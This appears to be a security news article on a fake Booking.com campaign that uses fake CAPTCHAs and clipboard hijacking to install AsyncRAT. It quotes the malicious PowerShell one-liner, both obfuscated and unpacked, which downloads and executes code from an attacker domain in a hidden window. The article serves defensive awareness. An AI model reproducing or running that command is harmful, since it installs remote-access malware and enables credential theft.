With the summer travel season in full swing, cybercriminals have launched a sophisticated campaign targeting travelers through fake Booking.com websites, redirect links, and fraudulent sponsored ads.
According to recent research by Malwarebytes, this campaign leverages evolving domains, fake CAPTCHAs, and dangerous clipboard hijacking techniques to deliver AsyncRAT malware—a Remote Access Trojan that poses severe risks to users’ data and privacy.
The scam first appeared in mid-May and continues to evolve, with threat actors rotating malicious domains every two to three days to evade detection and blacklists.
The attack vector typically begins when users, searching for travel deals, land on a malicious link disguised as a legitimate Booking.com page—often through gaming sites, social platforms, or sponsored advertisements.
Upon arrival, visitors are greeted by a fake CAPTCHA form, a technique increasingly popular among fraudsters.
Unlike legitimate CAPTCHAs, this prompt is designed to grant the site permission to access the user’s clipboard. When unsuspecting users tick the box, a script quietly injects malicious content into their clipboard.
Technical Breakdown: Clipboard Hijacking and PowerShell Payloads
The clipboard injection, executed via JavaScript’s document.execCommand('copy'), plants an obfuscated PowerShell command. The attackers employ deliberate casing, variable name fragments, and quote interruptions to obfuscate their real intentions:
powershellpOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
Unpacked, it becomes:
powershellpowershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
If a user follows the on-screen instructions—typically prompting them to paste and execute this command in the Windows Run dialog—a PowerShell window opens invisibly, fetching and running two executables (ckjg.exe and Stub.exe) from the attacker’s server.
The payload, detected as Backdoor.AsyncRAT, gives full remote control of the victim’s machine to attackers, enabling theft of credentials, financial data, and potentially far-reaching identity fraud.
Users of security tools such as Malwarebytes Browser Guard are alerted when their clipboard is accessed, often with explicit warnings about suspicious content.
Chrome may also display generic warnings about unsafe sites, though these can be vague and easily ignored without awareness of the underlying risk.
Malwarebytes researchers have tracked several domains associated with this campaign, with the URLs changing every few days. Recent examples include:
Anyone booking travel online, especially via search engines, should exercise extreme caution and verify URLs carefully.
As holiday scams grow more sophisticated, vigilance and technical awareness are key to safe and stress-free travel planning. Always book through trusted sources and watch for red flags—your vacation plans, and your personal data, depend on it.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…